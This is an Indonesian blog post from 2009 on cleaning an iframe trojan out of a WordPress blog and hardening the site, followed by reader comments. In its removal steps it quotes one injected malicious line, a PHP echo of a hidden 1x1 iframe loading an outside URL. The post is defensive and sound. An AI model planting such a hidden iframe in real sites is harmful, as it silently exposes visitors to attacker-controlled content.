Cara Mengantisipasi & Membasmi Virus/Trojan pada Blog Berbasis WordPress

virus-trojanKemarin saya menulis posting mengenai “Ada Virus/Trojan di Blog ?” dan meski sudah saya hilangkan, saya masih penasaran dan khawatir jika satu waktu ada trojan yang sama. Saya menuliskan posting tambahan ini dengan pertimbangan sebagai berikut :

  1. Reputasi. Blog bervirus tak pelak lagi bisa mencemarkan reputasi dan mempermalukan kita saat hendak mencontohkan blog ternyata ada virusnya. Meski Symantec menyatakan virus/trojan HTML Iframe sebagai “low risk”, gambar kutu (bug) yang tertangkap dilatar belakangi warna merah menyala membuat pengunjung langsung kabur.
  2. Celah Keamanan. Tidak menutup kemungkinan jika trojan tersebut bukan hanya merugikan pengunjung namun juga memperlambat akses ke blog dan merusak file-file yang ada didalamnya
  3. Popularitas & Penyebaran. Saya browsing di internet dan melihat cukup banyak blog/website yang terkena serangan virus/trojan sejenis. Bukan hanya blog berbasis WordPress namun juga menimpa blog berbasis Joomla, Drupal dan Forum berbasis VBulletin
  4. Penalti dari Google. Jika dibiarkan tanpa diatasi, blog bisa terkena penalti dari Google dengan menghilangkannya dari halaman pencarian atau paling minimal, memberikan pesan peringatan jika satu waktu kita melakukan pencarian yang memuat halaman website/blog yang disusupi.
  5. Mengurangi Pengunjung. Selain menurunkan reputasi dan penalti dari Google, adanya warning virus/trojan secara otomatis akan mengurangi jumlah pengunjung yang datang. Siapa pula yang hendak menceburkan diri ke website berisi virus/trojan…

CARA MEMBASMI VIRUS/TROJAN PADA WEBSITE/BLOG :

Berikut adalah cara membasmi virus/trojan yang mendekam agar tidak semakin merasuk ke berbagai file :

  1. Install plugin WordPress Exploit Scanner. Plugin ini ditest untuk WP versi 2.7.1 namun saya bisa menjalankannya pada WP 2.8.4. Setelah terinstall dan diaktivasi, akan ada menu tambahan pada bagian dashboard dengan nama : “Exploit Scanner”. Plugin ini akan melakukan pengecekan dan mendeteksi kode-kode tertentu yang dicurigai sebagai kode trojan. Mampu mendeteksi isi file maupun database. Perhatikan warning yang muncul jika terkait dengan file-file berikut : index.php, index.html, main.php, header.php, footer.php, termasuk jika ada indikasi susupan kode pada isi database
  2. Hapus bagian kode pada setiap file dab isi database yang mengandung kata “iframe” dan merujuk pada suatu alamat URL tertentu seperti contoh berikut ini (hati-hati menghapusnya karena ada juga contoh penggunaan iframe yang bukan virus, seperti iframe pada tampilan akismet) :
    echo "<iframe src=\"h++p://internetcountercheck.com/?click=18998015" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
  3. Update file yang terkena modifikasi dengan file yang sudah bersih
  4. Check ulang permission file. Ganti permission file dengan kode 777 (readable, writeable, executable untuk semua orang) menjadi 755. Hal ini bisa dilakukan menggunakan program FTP Client
  5. Akses ulang tampilan website/blog dan periksa page source. Check apakah benar kode yang dicurigai sudah dihilangkan.

CARA MENGANTISIPASI VIRUS/TROJAN DI BLOG

  1. Periksa permission file pada root folder dan folder themes. Jangan biasakan mengubah permission file untuk mengubah themes secara langsung. Jangan biasakan permission full akses untuk file dan folder (check ulang dengan requirement tertentu, karena kadang folder uploads dan cache harus diset dengan kondisi permission tertentu)
  2. Disable folder indexing. Hal ini bisa dilakukan dengan membuat baris tambahan pada file .htaccess. Bagi pengguna cpanel, ada menu khusus untuk ini jadi bisa lebih mudah untuk mengaktifkannya
  3. Gunakan strong password. Gunakan tipe password yang baik (gabungan huruf besar dan kecil, angka dan huruf dengan panjang tertentu, minimal 6 karakter) baik untuk password cpanel, fantastico, database, ftp maupun password admin
  4. Lakukan Upgrade. Jika saat ini menggunakan WordPress versi lama, segera lakukan upgrade ke versi terakhir. Saat ini versi WordPress terakhir adalah versi 2.8.4. Versi dibawah 2.8.4 memiliki celah keamanan data yang sangat riskan
  5. Periksa daftar Themes & Plugins. Hapus plugins dan themes yang tidak digunakan dan upgrade plugins yang out of date
  6. Matikan opsi “Anyone can register” pada bagian Settings, kecuali blog yang dibangun ditujukan untuk multi user
  7. Lakukan backup secara berkala

Mudah-mudahan bisa membantu rekan-rekan yang khawatir jika blognya terkena trojan.

Posted by vavai on Oct 15th, 2009 and is filed under Blog, Personal. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

22 Responses to “Cara Mengantisipasi & Membasmi Virus/Trojan pada Blog Berbasis WordPress”

  1. mitr@ku October 16th, 2009, 2:22 pm

    caranya untuk disable folder indexing di langkah nomor 2
    Indexignore *

  2. ban April 21st, 2010, 7:47 pm

    thanks buat tipsnya

  3. wahyu May 4th, 2010, 6:27 pm

    thank banget atas infonya… tapi kalau untuk joomla gimana ya….

  4. cara-blog.co.cc July 7th, 2010, 5:06 pm

    tukar link bro

  5. arfan from amazonku December 10th, 2010, 10:24 pm

    Thank’s buat infonya

  6. solichin February 7th, 2011, 1:17 pm

    makasih atas infonya yaw gan…

  7. dini April 27th, 2011, 1:16 pm

    sep thanks ya

  8. prakoso May 14th, 2011, 6:37 pm

    sipp,,, thnak kyu info’a…… bagus bget..

  9. software seo May 27th, 2011, 4:23 pm

    wew…blogku juga kena trojan iframe tuh!
    udah d scan trus d karantina

  10. Doddy July 10th, 2011, 5:41 pm

    thx ya infonya

  11. arterbagyo August 23rd, 2011, 9:15 am

    wah punya ane pas tak secan ada keteragan error gan??? gmn tu solusinya??

  12. Vavai August 23rd, 2011, 9:19 am

    @Arterbagyo,

    Pesan errornya apa ?

  13. donal September 16th, 2011, 5:11 pm

    Penting nih.Thanks buat infonya.

  14. serba serbi January 12th, 2012, 4:03 pm

    gan kalau untuk blogspot gimana caranya gan….?????

  15. Sulken July 16th, 2014, 3:25 pm

    Saya juga dah pernah kena itu Om sama trojan mailer daemon kalau ndak salah, sampai kena suspend sama hostingnya karena membebani server, tapi untunglah ada scanner virus di cpanel, maksih tipsnya.

  16. Norman May 19th, 2016, 5:13 am

    web saya pernah terkena virus dan sekarang sudah diperbaiki dan bersih. Tapi setelah dicek banyak halaman yang tidek diindek oleh google lagi. Sudah coba langkah submit URL dan tambahkan peta situs, sampai sekarang (hampir 2 minggu) halaman-halaman tersebut belum diindek juga, apakah langkah saya tepat atau ada cara lainnya, tolong dibantu sarannya.
    Terima kasih

Trackbacks

  1. Health For All » Blog Archive » Upgrade Wordpress 2.8.4
  2. Tips Mengatasi Google Sandbox & Mengembalikan Indeks Website di Google Bagian 1 | Migrasi Windows Linux
  3. Tips Mengatasi Google Sandbox & Mengembalikan Indeks Website di Google Bagian 2 | Migrasi Windows Linux
  4. Tips Mengatasi Google Sandbox & Mengembalikan Indeks Website di Google Bagian 2
  5. Cara Mengantisipasi & Membasmi Virus/Trojan pada Blog Berbasis WordPress
  6. Cara Mengantisipasi & Membasmi Virus/Trojan pada Blog Berbasis WordPress | Hendri Creative

Leave a Reply